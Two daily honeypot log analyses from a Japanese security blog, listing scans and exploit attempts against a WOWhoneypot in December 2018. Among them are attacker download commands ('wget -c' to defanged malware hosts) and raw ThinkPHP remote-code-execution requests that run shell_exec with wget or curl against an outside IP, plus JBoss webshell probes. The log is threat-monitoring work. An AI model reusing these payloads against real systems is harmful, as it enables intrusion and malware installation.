S-Owl

S(ecurity)Owl

ハニーポットのログ分析(2018/12/16)

WOWhoneypotの2018/12/16(日) (運用193日目)の簡易分析です。
本日の総アクセス件数は 754件です。

本日の主なアクセスは以下です。

phpのWebShell設置の調査:418件
phpMyAdminの調査:151件
Apache Struts2脆弱性S2-045(CVE-2017-5638)を突く攻撃:32件
JBossに対する調査:27件
Tomcat管理ページへのブルートフォース攻撃:18件
・ThinkPHPの脆弱性を突いた攻撃:10件

本日のドメイン名でのアクセスは以下です。

4 GET /
1 GET /robots.txt 

本日のハンティングログは以下です。

8 2018-12-16 wget -c hxxp://wap.tfddos[.]net:57843/linux
5 2018-12-16 wget -c hxxp://154.85.99[.]85:8080/5325
2 2018-12-16 wget -c hxxp://103.212.33[.]251:896/encten26
1 2018-12-16 wget -c hxxp://103.212.33[.]251:896/sqlex 

 

以下が全アクセスログです。

件数 日付 種別 リクエス
63 2018-12-16 アクセス GET /
32 2018-12-16 Apache Struts2脆弱性S2-045(CVE-2017-5638)を突く攻撃 GET /index.action
18 2018-12-16 Tomcat管理ページへのブルートフォース攻撃 GET /manager/html
8 2018-12-16 phpのWebShell設置の調査 POST /confg.php
8 2018-12-16 phpのWebShell設置の調査 POST /1.php
7 2018-12-16 phpのWebShell設置の調査 POST /qq.php
5 2018-12-16 phpのWebShell設置の調査 POST /test.php
4 2018-12-16 phpのWebShell設置の調査 POST /xx.php
4 2018-12-16 phpのWebShell設置の調査 POST /x.php
4 2018-12-16 phpのWebShell設置の調査 POST /s.php
4 2018-12-16 phpのWebShell設置の調査 POST /q.php
4 2018-12-16 phpのWebShell設置の調査 POST /hello.php
4 2018-12-16 phpのWebShell設置の調査 POST /2.php
4 2018-12-16 phpMyAdminの調査 GET /www/phpMyAdmin/index.php
4 2018-12-16 phpMyAdminの調査 GET /web/phpMyAdmin/index.php
4 2018-12-16 phpMyAdminの調査 GET /tools/phpMyAdmin/index.php
4 2018-12-16 phpのWebShell設置の調査 GET /shell.php
4 2018-12-16 phpMyAdminの調査 GET /phpMyAdmin/phpMyAdmin/index.php
4 2018-12-16 phpMyAdminの調査 GET /phpMyAdmin/index.php
4 2018-12-16 phpのWebShell設置の調査 GET /cmd.php
4 2018-12-16 phpMyAdminの調査 GET /claroline/phpMyAdmin/index.php
3 2018-12-16 phpのWebShell設置の調査 POST /z.php
2 2018-12-16 IIS脆弱性(CVE-2017-7269)を突く攻撃 PROPFIND /
2 2018-12-16 phpのWebShell設置の調査 POST /zzk.php
2 2018-12-16 phpのWebShell設置の調査 POST /zuoss.php
2 2018-12-16 phpのWebShell設置の調査 POST /zuos.php
2 2018-12-16 phpのWebShell設置の調査 POST /zuoshss.php
2 2018-12-16 phpのWebShell設置の調査 POST /zuoshou.php
2 2018-12-16 phpのWebShell設置の調査 POST /zuo.php
2 2018-12-16 phpのWebShell設置の調査 POST /zuoindex.php
2 2018-12-16 phpのWebShell設置の調査 POST /zshmindex.php
2 2018-12-16 phpのWebShell設置の調査 POST /yumo.php
2 2018-12-16 phpのWebShell設置の調査 POST /yj.php
2 2018-12-16 phpのWebShell設置の調査 POST /yao.php
2 2018-12-16 phpのWebShell設置の調査 POST /xz.php
2 2018-12-16 phpのWebShell設置の調査 POST /xxx.php
2 2018-12-16 phpのWebShell設置の調査 POST /xw.php
2 2018-12-16 phpのWebShell設置の調査 POST /xw1.php
2 2018-12-16 phpのWebShell設置の調査 POST /xshell.php
2 2018-12-16 phpのWebShell設置の調査 POST /xp.php
2 2018-12-16 phpのWebShell設置の調査 POST /xiao.php
2 2018-12-16 phpのWebShell設置の調査 POST /xiaomo.php
2 2018-12-16 phpのWebShell設置の調査 POST /xiaoma.php
2 2018-12-16 phpのWebShell設置の調査 POST /xiaomae.php
2 2018-12-16 phpのWebShell設置の調査 POST /xiaodai.php
2 2018-12-16 phpのWebShell設置の調査 POST /wuwu11.php
2 2018-12-16 phpのWebShell設置の調査 POST /wshell.php
2 2018-12-16 phpのWebShell設置の調査 POST /w.php
2 2018-12-16 WordPressの調査 POST /wp-admins.php
2 2018-12-16 phpのWebShell設置の調査 POST /weixiao.php
2 2018-12-16 phpのWebShell設置の調査 POST /webslee.php
2 2018-12-16 phpのWebShell設置の調査 POST /wcp.php
2 2018-12-16 phpのWebShell設置の調査 POST /wc.php
2 2018-12-16 phpのWebShell設置の調査 POST /wb.php
2 2018-12-16 phpのWebShell設置の調査 POST /wan.php
2 2018-12-16 phpのWebShell設置の調査 POST /wanan.php
2 2018-12-16 phpのWebShell設置の調査 POST /ver.php
2 2018-12-16 phpのWebShell設置の調査 POST /uuu.php
2 2018-12-16 phpのWebShell設置の調査 POST /u.php
2 2018-12-16 phpのWebShell設置の調査 POST /toor.php
2 2018-12-16 phpのWebShell設置の調査 POST /tiandi.php
2 2018-12-16 phpのWebShell設置の調査 POST /system.php
2 2018-12-16 phpのWebShell設置の調査 POST /sss.php
2 2018-12-16 phpのWebShell設置の調査 POST /Ss.php
2 2018-12-16 phpのWebShell設置の調査 POST /ss.php
2 2018-12-16 phpのWebShell設置の調査 POST /ssaa.php
2 2018-12-16 phpのWebShell設置の調査 POST /she.php
2 2018-12-16 phpのWebShell設置の調査 POST /sha.php
2 2018-12-16 phpのWebShell設置の調査 POST /sean.php
2 2018-12-16 phpのWebShell設置の調査 POST /s1.php
2 2018-12-16 phpのWebShell設置の調査 POST /ruyi.php
2 2018-12-16 phpのWebShell設置の調査 POST /repeat.php
2 2018-12-16 phpのWebShell設置の調査 POST /qwe.php
2 2018-12-16 phpのWebShell設置の調査 POST /qaz.php
2 2018-12-16 phpのWebShell設置の調査 POST /qaq.php
2 2018-12-16 phpのWebShell設置の調査 POST /qa.php
2 2018-12-16 phpのWebShell設置の調査 POST /ppx.php
2 2018-12-16 phpのWebShell設置の調査 POST /p.php
2 2018-12-16 phpのWebShell設置の調査 POST /post.php
2 2018-12-16 phpMyAdminの調査 POST /pma.php
2 2018-12-16 phpのWebShell設置の調査 POST /phpStudy.php
2 2018-12-16 phpのWebShell設置の調査 POST /phpstudy.php
2 2018-12-16 phpのWebShell設置の調査 POST /phpinfi.php
2 2018-12-16 phpのWebShell設置の調査 POST /.php
2 2018-12-16 phpのWebShell設置の調査 POST /pe.php
2 2018-12-16 phpのWebShell設置の調査 POST /ou2.php
2 2018-12-16 phpのWebShell設置の調査 POST /okokok.php
2 2018-12-16 phpのWebShell設置の調査 POST /nuoxi.php
2 2018-12-16 phpのWebShell設置の調査 POST /mz.php
2 2018-12-16 phpのWebShell設置の調査 POST /mx.php
2 2018-12-16 phpのWebShell設置の調査 POST /m.php?pbid=open
2 2018-12-16 phpのWebShell設置の調査 POST /m.php
2 2018-12-16 phpのWebShell設置の調査 POST /min.php
2 2018-12-16 phpのWebShell設置の調査 POST /miao.php
2 2018-12-16 phpのWebShell設置の調査 POST /MCLi.php
2 2018-12-16 phpのWebShell設置の調査 POST /log.php
2 2018-12-16 phpのWebShell設置の調査 POST /linuxse.php
2 2018-12-16 phpのWebShell設置の調査 POST /lindex.php
2 2018-12-16 phpのWebShell設置の調査 POST /ldw.php
2 2018-12-16 phpのWebShell設置の調査 POST /l8.php
2 2018-12-16 phpのWebShell設置の調査 POST /l7.php
2 2018-12-16 phpのWebShell設置の調査 POST /l6.php
2 2018-12-16 phpのWebShell設置の調査 POST /ip.php
2 2018-12-16 phpのWebShell設置の調査 POST /infos.php
2 2018-12-16 phpのWebShell設置の調査 POST /infoo.php
2 2018-12-16 phpのWebShell設置の調査 POST /HX.php
2 2018-12-16 phpのWebShell設置の調査 POST /htfr.php
2 2018-12-16 phpのWebShell設置の調査 POST /hm.php
2 2018-12-16 phpのWebShell設置の調査 POST /hh.php
2 2018-12-16 phpのWebShell設置の調査 POST /help.php
2 2018-12-16 phpのWebShell設置の調査 POST /hell.php
2 2018-12-16 phpのWebShell設置の調査 POST /hacly.php
2 2018-12-16 phpのWebShell設置の調査 POST /hack.php
2 2018-12-16 phpのWebShell設置の調査 POST /h1.php
2 2018-12-16 phpのWebShell設置の調査 POST /godkey.php
2 2018-12-16 phpのWebShell設置の調査 POST /general.php
2 2018-12-16 phpのWebShell設置の調査 POST /feixiang.php
2 2018-12-16 phpのWebShell設置の調査 POST /fack.php
2 2018-12-16 phpのWebShell設置の調査 POST /erwa.php
2 2018-12-16 phpのWebShell設置の調査 POST /diy.php
2 2018-12-16 phpのWebShell設置の調査 POST /dexgp.php
2 2018-12-16 phpのWebShell設置の調査 POST /defect.php
2 2018-12-16 phpのWebShell設置の調査 POST /default.php
2 2018-12-16 phpのWebShell設置の調査 POST /db.init.php
2 2018-12-16 phpのWebShell設置の調査 POST /db__.init.php
2 2018-12-16 phpのWebShell設置の調査 POST /db_desql.php
2 2018-12-16 phpのWebShell設置の調査 POST /db_dataml.php
2 2018-12-16 phpのWebShell設置の調査 POST /data.php
2 2018-12-16 phpのWebShell設置の調査 POST /cxfm666.php
2 2018-12-16 phpのWebShell設置の調査 POST /core.php
2 2018-12-16 phpのWebShell設置の調査 POST /conf.php
2 2018-12-16 phpのWebShell設置の調査 POST /conf1g.php
2 2018-12-16 phpのWebShell設置の調査 POST /cmd.php
2 2018-12-16 phpのWebShell設置の調査 POST /ceshi.php
2 2018-12-16 phpのWebShell設置の調査 POST /caonma.php
2 2018-12-16 phpのWebShell設置の調査 POST /cainiao.php
2 2018-12-16 phpのWebShell設置の調査 POST /boots.php
2 2018-12-16 phpのWebShell設置の調査 POST /bak.php
2 2018-12-16 phpのWebShell設置の調査 POST /aw.php
2 2018-12-16 phpのWebShell設置の調査 POST /api.php
2 2018-12-16 phpのWebShell設置の調査 POST /a.php
2 2018-12-16 phpのWebShell設置の調査 POST /aotu.php
2 2018-12-16 phpのWebShell設置の調査 POST /angge.php
2 2018-12-16 phpのWebShell設置の調査 POST /ak.php
2 2018-12-16 phpのWebShell設置の調査 POST /ak48.php
2 2018-12-16 phpのWebShell設置の調査 POST /ak47.php
2 2018-12-16 phpのWebShell設置の調査 POST /admn.php
2 2018-12-16 phpのWebShell設置の調査 POST /aa.php
2 2018-12-16 phpのWebShell設置の調査 POST /aaaa.php
2 2018-12-16 phpのWebShell設置の調査 POST /9678.php
2 2018-12-16 phpのWebShell設置の調査 POST /9510.php
2 2018-12-16 phpのWebShell設置の調査 POST /92.php
2 2018-12-16 phpのWebShell設置の調査 POST /7.php
2 2018-12-16 phpのWebShell設置の調査 POST /777.php
2 2018-12-16 phpのWebShell設置の調査 POST /666.php
2 2018-12-16 phpのWebShell設置の調査 POST /56.php
2 2018-12-16 phpのWebShell設置の調査 POST /5201314.php
2 2018-12-16 phpのWebShell設置の調査 POST /51314.php
2 2018-12-16 phpのWebShell設置の調査 POST /3.php
2 2018-12-16 phpのWebShell設置の調査 POST /12.php
2 2018-12-16 phpのWebShell設置の調査 POST /123.php
2 2018-12-16 phpのWebShell設置の調査 POST /1213.php
2 2018-12-16 phpのWebShell設置の調査 GET /z.php
2 2018-12-16 phpのWebShell設置の調査 GET /x.php
2 2018-12-16 phpのWebShell設置の調査 GET /wpo.php
2 2018-12-16 phpのWebShell設置の調査 GET /wpc.php
2 2018-12-16 phpのWebShell設置の調査 GET /wp-config.php
2 2018-12-16 WebDAVの調査 GET /webdav/
2 2018-12-16 phpMyAdminの調査 GET /v/index.php
2 2018-12-16 phpのWebShell設置の調査 GET /uploader.php
2 2018-12-16 phpMyAdminの調査 GET /typo3/phpmyadmin/index.php
2 2018-12-16 phpのWebShell設置の調査 GET /text.php
2 2018-12-16 phpのWebShell設置の調査 GET /test.php
2 2018-12-16 PHPWetherMapの調査 GET /shopdb/index.php
2 2018-12-16 phpMyAdminの調査 GET /shaAdmin/index.php
2 2018-12-16 phpMyAdminの調査 GET /scripts/setup.php
2 2018-12-16 phpのWebShell設置の調査 GET /_query.php
2 2018-12-16 phpMyAdminの調査 GET /program/index.php
2 2018-12-16 phpMyAdminの調査 GET /pmd_online.php
2 2018-12-16 phpMyAdminの調査 GET /pmd/index.php
2 2018-12-16 phpMyAdminの調査 GET /pma-old/index.php
2 2018-12-16 phpMyAdminの調査 GET /pmamy/index.php
2 2018-12-16 phpMyAdminの調査 GET /pmamy2/index.php
2 2018-12-16 phpMyAdminの調査 GET /PMA/index.php
2 2018-12-16 phpMyAdminの調査 GET /pma/index.php
2 2018-12-16 phpMyAdminの調査 GET /PMA2/index.php
2 2018-12-16 PHPWetherMapの調査 GET /plugins/weathermap/editor.php
2 2018-12-16 PHPWetherMapの調査 GET /phppma/index.php
2 2018-12-16 PHPWetherMapの調査 GET /phpmy/index.php
2 2018-12-16 phpMyAdminの調査 GET /phpMyAdmion/index.php
2 2018-12-16 phpMyAdminの調査 GET /phpMyAdmin/scripts/setup.php
2 2018-12-16 phpMyAdminの調査 GET /phpmyadmin/scripts/setup.php
2 2018-12-16 phpMyAdminの調査 GET /phpMyAdmin/scripts/db___.init.php
2 2018-12-16 phpMyAdminの調査 GET /phpmyadmin/scripts/db___.init.php
2 2018-12-16 phpMyAdminの調査 GET /phpmyadmin/phpmyadmin/index.php
2 2018-12-16 phpMyAdminの調査 GET /phpMyAdminold/index.php
2 2018-12-16 phpMyAdminの調査 GET /phpMyAdmin.old/index.php
2 2018-12-16 phpMyAdminの調査 GET /phpmyadmin-old/index.php
2 2018-12-16 phpMyAdminの調査 GET /phpMyAdmin+++---/index.php
2 2018-12-16 phpMyAdminの調査 GET /phpMyAdmin__/index.php
2 2018-12-16 phpMyAdminの調査 GET /phpmyadmin/index.php
2 2018-12-16 phpMyAdminの調査 GET /phpMyadmin_bak/index.php
2 2018-12-16 phpMyAdminの調査 GET /phpMyAdmina/index.php
2 2018-12-16 phpMyAdminの調査 GET /phpMyAdmin-4.4.0/index.php
2 2018-12-16 phpMyAdminの調査 GET /phpmyadmin2/index.php
2 2018-12-16 phpMyAdminの調査 GET /phpMyAdmin1/index.php
2 2018-12-16 phpMyAdminの調査 GET /phpmyadmin1/index.php
2 2018-12-16 phpMyAdminの調査 GET /phpMyAdmin123/index.php
2 2018-12-16 phpMyAdminの調査 GET /phpmyadmin0/index.php
2 2018-12-16 phpMyAdminの調査 GET /phpMyadmi/index.php
2 2018-12-16 phpMyAdminの調査 GET /phpMyAdm1n/index.php
2 2018-12-16 phpMyAdminの調査 GET /phpmyadm1n/index.php
2 2018-12-16 phpMyAdminの調査 GET /phpma/index.php
2 2018-12-16 phpMyAdminの調査 GET /phpAdmin/index.php
2 2018-12-16 phpMyAdminの調査 GET /phpadmin/index.php
2 2018-12-16 phpMyAdminの調査 GET /mysql/sqlmanager/index.php
2 2018-12-16 phpMyAdminの調査 GET /mysql/mysqlmanager/index.php
2 2018-12-16 phpMyAdminの調査 GET /mysql/dbadmin/index.php
2 2018-12-16 phpMyAdminの調査 GET /mysqladmin/index.php
2 2018-12-16 phpMyAdminの調査 GET /mysql/admin/index.php
2 2018-12-16 phpMyAdminの調査 GET /mysql-admin/index.php
2 2018-12-16 phpMyAdminの調査 GET /MyAdmin/index.php
2 2018-12-16 phpMyAdminの調査 GET /myadmin/index.php
2 2018-12-16 phpMyAdminの調査 GET /myadmin2/index.php
2 2018-12-16 phpのWebShell設置の調査 GET /muhstik.php
2 2018-12-16 phpのWebShell設置の調査 GET /muhstik-dpr.php
2 2018-12-16 phpのWebShell設置の調査 GET /muhstik2.php
2 2018-12-16 phpのWebShell設置の調査 GET /lol.php
2 2018-12-16 phpのWebShell設置の調査 GET /log.php
2 2018-12-16 phpのWebShell設置の調査 GET /logon.php
2 2018-12-16 phpのWebShell設置の調査 GET /license.php
2 2018-12-16 phpのWebShell設置の調査 GET /lala.php
2 2018-12-16 phpのWebShell設置の調査 GET /lala-dpr.php
2 2018-12-16 phpのWebShell設置の調査 GET /knal.php
2 2018-12-16 JBossに対する調査 GET /jexws4/jexws4.jsp?ppp=echo%20Hello%20D3c3mb3r
2 2018-12-16 JBossに対する調査 GET /jexws2/jexws2.jsp?ppp=echo%20Hello%20D3c3mb3r
2 2018-12-16 JBossに対する調査 GET /jexsw2/jexsw2.jsp?ppp=echo%20Hello%20D3c3mb3r
2 2018-12-16 JBossに対する調査 GET /jexinv/jexinv.jsp?ppp=echo%20Hello%20D3c3mb3r
2 2018-12-16 JBossに対する調査 GET /jexinv4/jexinv4.jsp?ppp=echo%20Hello%20D3c3mb3r
2 2018-12-16 JBossに対する調査 GET /jexinv3/jexinv3.jsp?ppp=echo%20Hello%20D3c3mb3r
2 2018-12-16 phpのWebShell設置の調査 GET /java.php
2 2018-12-16 phpMyAdminの調査 GET /index.php
2 2018-12-16 不正中継の調査 GET hxxp://www.ip.cn/
2 2018-12-16 不正中継の調査 GET hxxp://www.123cha.com/
2 2018-12-16 不正中継の調査 GET hxxp://www.123cha.com
2 2018-12-16 不正中継の調査 GET hxxp://api.ipify.org/
2 2018-12-16 phpのWebShell設置の調査 GET /help.php
2 2018-12-16 phpのWebShell設置の調査 GET /help-e.php
2 2018-12-16 phpのWebShell設置の調査 GET /hell.php
2 2018-12-16 JBossに対する調査 GET /dread/lock.jsp?tezaz=echo%20Hello%20D3c3mb3r
2 2018-12-16 phpのWebShell設置の調査 GET /desktop.ini.php
2 2018-12-16 JBossに対する調査 GET /demo/404.jsp?bjh=echo%20Hello%20D3c3mb3r
2 2018-12-16 phpMyAdminの調査 GET /db_pma.php
2 2018-12-16 phpMyAdminの調査 GET /db/index.php
2 2018-12-16 phpのWebShell設置の調査 GET /db_cts.php
2 2018-12-16 phpMyAdminの調査 GET /dbadmin/index.php
2 2018-12-16 phpのWebShell設置の調査 GET /cmx.php
2 2018-12-16 phpのWebShell設置の調査 GET /cmv.php
2 2018-12-16 phpのWebShell設置の調査 GET /cmdd.php
2 2018-12-16 phpのWebShell設置の調査 GET /appserv.php
2 2018-12-16 phpMyAdminの調査 GET /admin/PMA/index.php
2 2018-12-16 phpMyAdminの調査 GET /admin/pma/index.php
2 2018-12-16 phpMyAdminの調査 GET /admin/phpMyAdmin/index.php
2 2018-12-16 phpMyAdminの調査 GET /admin/phpmyadmin/index.php
2 2018-12-16 phpMyAdminの調査 GET /admin/phpmyadmin2/index.php
2 2018-12-16 phpMyAdminの調査 GET /admin/mysql/index.php
2 2018-12-16 phpMyAdminの調査 GET /admin/mysql2/index.php
2 2018-12-16 phpMyAdminの調査 GET /admin/index.php
2 2018-12-16 不正中継の調査 CONNECT www.baidu.com:443
2 2018-12-16 不正中継の調査 CONNECT www.baidu.com
2 2018-12-16 不正中継の調査 CONNECT cn.bing.com:443
1 2018-12-16 phpのWebShell設置の調査 POST /xiaoyu.php
1 2018-12-16 phpのWebShell設置の調査 POST /xiaomar.php
1 2018-12-16 phpのWebShell設置の調査 POST /xiaohei.php
1 2018-12-16 Hadoop YARN ResourceManagerの脆弱性を突く攻撃 POST /ws/v1/cluster/apps/new-application
1 2018-12-16 phpのWebShell設置の調査 POST /uu.php
1 2018-12-16 phpのWebShell設置の調査 POST /tomcat.php
1 2018-12-16 phpのWebShell設置の調査 POST /sheep.php
1 2018-12-16 phpのWebShell設置の調査 POST /qwq.php
1 2018-12-16 phpのWebShell設置の調査 POST /qw.php
1 2018-12-16 phpのWebShell設置の調査 POST /qq5262.php
1 2018-12-16 phpのWebShell設置の調査 POST /python.php
1 2018-12-16 phpのWebShell設置の調査 POST /mm.php
1 2018-12-16 phpのWebShell設置の調査 POST /j.php
1 2018-12-16 GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃 POST /GponForm/diag_Form?images/
1 2018-12-16 phpのWebShell設置の調査 POST /fusheng.php
1 2018-12-16 phpのWebShell設置の調査 POST /db_session.init.php
1 2018-12-16 phpのWebShell設置の調査 POST /db.php
1 2018-12-16 phpのWebShell設置の調査 POST /conflg.php
1 2018-12-16 phpのWebShell設置の調査 POST /cadre.php
1 2018-12-16 phpのWebShell設置の調査 POST /app.php
1 2018-12-16 phpのWebShell設置の調査 POST /51.php
1 2018-12-16 phpのWebShell設置の調査 POST /1q.php
1 2018-12-16 phpのWebShell設置の調査 POST /1hou.php
1 2018-12-16 調査 OPTIONS /
1 2018-12-16 調査 HEAD /
1 2018-12-16 phpMyAdminの調査 GET /xampp/phpmyadmin/index.php
1 2018-12-16 JBossに対する調査 GET /wstats/wstats.jsp?comment=echo%20Hello%20D3c3mb3r
1 2018-12-16 PHPWetherMapの調査 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php
1 2018-12-16 ThinkPHPの脆弱性を突いた攻撃 GET /TP/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP
1 2018-12-16 ThinkPHPの脆弱性を突いた攻撃 GET /TP/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP
1 2018-12-16 ThinkPHPの脆弱性を突いた攻撃 GET /TP/html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP
1 2018-12-16 ThinkPHPの脆弱性を突いた攻撃 GET /thinkphp/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP
1 2018-12-16 ThinkPHPの脆弱性を突いた攻撃 GET /thinkphp/html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP
1 2018-12-16 JBossに対する調査 GET /shellinvoker/shellinvoker.jsp?ppp=echo%20Hello%20D3c3mb3r
1 2018-12-16 クローリング GET /robots.txt
1 2018-12-16 phpMyAdminの調査 GET /pwd/index.php
1 2018-12-16 ThinkPHPの脆弱性を突いた攻撃 GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP
1 2018-12-16 phpMyAdminの調査 GET /phpMyAbmin/index.php
1 2018-12-16 phpMyAdminの調査 GET /mysql/index.php
1 2018-12-16 phpMyAdminの調査 GET /mysql_admin/index.php
1 2018-12-16 phpのWebShell設置の調査 GET /muhstiks.php
1 2018-12-16 JBossに対する調査 GET /jvrx/cmd.jsp?pwd=everymorning&cmd=echo%20Hello%20D3c3mb3r
1 2018-12-16 JBossに対する調査 GET /jexws3/jexws3.jsp?ppp=echo%20Hello%20D3c3mb3r
1 2018-12-16 JBossに対する調査 GET /jbws/jbws.jsp?eval=echo%20Hello%20D3c3mb3r
1 2018-12-16 JBossに対する調査 GET /jbossass/jbossass.jsp?ppp=echo%20Hello%20D3c3mb3r
1 2018-12-16 ThinkPHPの脆弱性を突いた攻撃 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars0]=shell_exec&vars1]]=wget%20176.32.33.124/zzt
1 2018-12-16 ThinkPHPの脆弱性を突いた攻撃 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars0]=shell_exec&vars1]]=curl%20176.32.33.124/zzta
1 2018-12-16 ThinkPHPの脆弱性を突いた攻撃 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP
1 2018-12-16 JBossに対する調査 GET /iesvc/iesvc.jsp?comment=echo%20Hello%20D3c3mb3r
1 2018-12-16 JBossに対する調査 GET /idssvc/idssvc.jsp?comment=echo%20Hello%20D3c3mb3r
1 2018-12-16 ThinkPHPの脆弱性を突いた攻撃 GET /html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP
1 2018-12-16 phpのWebShell設置の調査 GET /htdocs.php
1 2018-12-16 JBossに対する調査 GET /HCEGH/xunfeng.jsp?comment=echo%20Hello%20D3c3mb3r
1 2018-12-16 JBossに対する調査 GET /console/jspzxc.jsp?cmd=echo%20Hello%20D3c3mb3r
1 2018-12-16 PHPWetherMapの調査 GET /cacti/plugins/weathermap/editor.php
1 2018-12-16 JBossに対する調査 GET /a/pwn.jsp?cmd=echo%20Hello%20D3c3mb3r

 

以上です。

ハニーポットのログ分析(2018/12/15)

WOWhoneypotの2018/12/15(土) (運用192日目)の簡易分析です。
本日の総アクセス件数は 952件です。

本日の主なアクセスは以下です。

phpのWebShell設置の調査:400件
phpMyAdminの調査:318件
Apache Struts2脆弱性S2-045(CVE-2017-5638)を突く攻撃:57件
Tomcat管理ページへのブルートフォース攻撃:26件
JBossに対する調査:25件
・ThinkPHPの脆弱性を突いた攻撃:9件
 →前日から継続してこれだけを狙ってきているものが1件来ています。
  それ以外はphpのWebShellやphpMyAdminJBossを狙って調査を大量にしてくるアクターが新たに貪欲に取り込んで複数のパスに対して投げてきています。
・(新規)ThinkPHPのログの調査:1件
 →上記とはまた別のIPがThinkPHPに対してログファイルの有無で利用を調査してくるスキャンがありました。
HEAD /User/Runtime/Logs/Home/18_12_14.log

本日のドメイン名でのアクセスは以下です。

9 POST /wp-login.php
2 GET /

本日のハンティングログは以下です。

8 2018-12-15 wget -c hxxp://wap.tfddos[.]net:57843/linux
5 2018-12-15 wget -c hxxp://154.85.99[.]85:8080/5325
2 2018-12-15 wget -c hxxp://103.73.160[.]136:1314/nt
1 2018-12-15 wget hxxp://103.45.109[.]111:5775/root1
1 2018-12-15 wget -c hxxp://103.73.160[.]136:1314/dos64 

  

以下が全アクセスログです。

件数 日付 種別 リクエス
62 2018-12-15 アクセス GET /
57 2018-12-15 Apache Struts2脆弱性S2-045(CVE-2017-5638)を突く攻撃 GET /index.action
26 2018-12-15 Tomcat管理ページへのブルートフォース攻撃 GET /manager/html
9 2018-12-15 WordPressの調査 POST /wp-login.php
8 2018-12-15 phpのWebShell設置の調査 POST /confg.php
6 2018-12-15 phpのWebShell設置の調査 POST /qq.php
6 2018-12-15 phpMyAdminの調査 GET /www/phpMyAdmin/index.php
6 2018-12-15 phpMyAdminの調査 GET /web/phpMyAdmin/index.php
6 2018-12-15 phpMyAdminの調査 GET /tools/phpMyAdmin/index.php
6 2018-12-15 phpのWebShell設置の調査 GET /shell.php
6 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin/phpMyAdmin/index.php
6 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin/index.php
6 2018-12-15 phpのWebShell設置の調査 GET /cmd.php
6 2018-12-15 phpMyAdminの調査 GET /claroline/phpMyAdmin/index.php
6 2018-12-15 phpMyAdminの調査 GET /admin/phpMyAdmin/index.php
5 2018-12-15 phpのWebShell設置の調査 POST /xx.php
5 2018-12-15 phpのWebShell設置の調査 POST /s.php
5 2018-12-15 phpのWebShell設置の調査 POST /1.php
4 2018-12-15 phpのWebShell設置の調査 POST /test.php
4 2018-12-15 phpのWebShell設置の調査 POST /q.php
3 2018-12-15 IIS脆弱性(CVE-2017-7269)を突く攻撃 PROPFIND /
3 2018-12-15 phpのWebShell設置の調査 POST /zuo.php
3 2018-12-15 phpのWebShell設置の調査 POST /yao.php
3 2018-12-15 phpのWebShell設置の調査 POST /xw.php
3 2018-12-15 phpのWebShell設置の調査 POST /xshell.php
3 2018-12-15 phpのWebShell設置の調査 POST /xiao.php
3 2018-12-15 phpのWebShell設置の調査 POST /wuwu11.php
3 2018-12-15 phpのWebShell設置の調査 POST /w.php
3 2018-12-15 WordPressの調査 POST /wp-admins.php
3 2018-12-15 phpのWebShell設置の調査 POST /weixiao.php
3 2018-12-15 phpのWebShell設置の調査 POST /sheep.php
3 2018-12-15 phpのWebShell設置の調査 POST /qaq.php
3 2018-12-15 phpのWebShell設置の調査 POST /phpStudy.php
3 2018-12-15 phpのWebShell設置の調査 POST /mx.php
3 2018-12-15 phpのWebShell設置の調査 POST /m.php?pbid=open
3 2018-12-15 phpのWebShell設置の調査 POST /lindex.php
3 2018-12-15 phpのWebShell設置の調査 POST /hello.php
3 2018-12-15 phpのWebShell設置の調査 POST /defect.php
3 2018-12-15 phpのWebShell設置の調査 POST /db_session.init.php
3 2018-12-15 phpのWebShell設置の調査 POST /db.init.php
3 2018-12-15 phpのWebShell設置の調査 POST /db__.init.php
3 2018-12-15 phpのWebShell設置の調査 POST /db_desql.php
3 2018-12-15 phpのWebShell設置の調査 POST /db_dataml.php
3 2018-12-15 phpのWebShell設置の調査 POST /conflg.php
3 2018-12-15 phpのWebShell設置の調査 POST /cmd.php
3 2018-12-15 phpのWebShell設置の調査 POST /cainiao.php
3 2018-12-15 phpのWebShell設置の調査 POST /ak47.php
3 2018-12-15 phpのWebShell設置の調査 POST /9678.php
3 2018-12-15 phpのWebShell設置の調査 POST /2.php
3 2018-12-15 phpのWebShell設置の調査 GET /x.php
3 2018-12-15 phpMyAdminの調査 GET /xampp/phpmyadmin/index.php
3 2018-12-15 phpのWebShell設置の調査 GET /wpo.php
3 2018-12-15 phpのWebShell設置の調査 GET /wpc.php
3 2018-12-15 PHPWetherMapの調査 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php
3 2018-12-15 phpのWebShell設置の調査 GET /wp-config.php
3 2018-12-15 WebDAVの調査 GET /webdav/
3 2018-12-15 phpMyAdminの調査 GET /v/index.php
3 2018-12-15 phpのWebShell設置の調査 GET /uploader.php
3 2018-12-15 phpMyAdminの調査 GET /typo3/phpmyadmin/index.php
3 2018-12-15 phpのWebShell設置の調査 GET /text.php
3 2018-12-15 phpのWebShell設置の調査 GET /test.php
3 2018-12-15 PHPWetherMapの調査 GET /shopdb/index.php
3 2018-12-15 phpMyAdminの調査 GET /shaAdmin/index.php
3 2018-12-15 phpのWebShell設置の調査 GET /_query.php
3 2018-12-15 phpMyAdminの調査 GET /pwd/index.php
3 2018-12-15 phpMyAdminの調査 GET /program/index.php
3 2018-12-15 phpMyAdminの調査 GET /pmd_online.php
3 2018-12-15 phpMyAdminの調査 GET /pma-old/index.php
3 2018-12-15 phpMyAdminの調査 GET /pmamy/index.php
3 2018-12-15 phpMyAdminの調査 GET /pmamy2/index.php
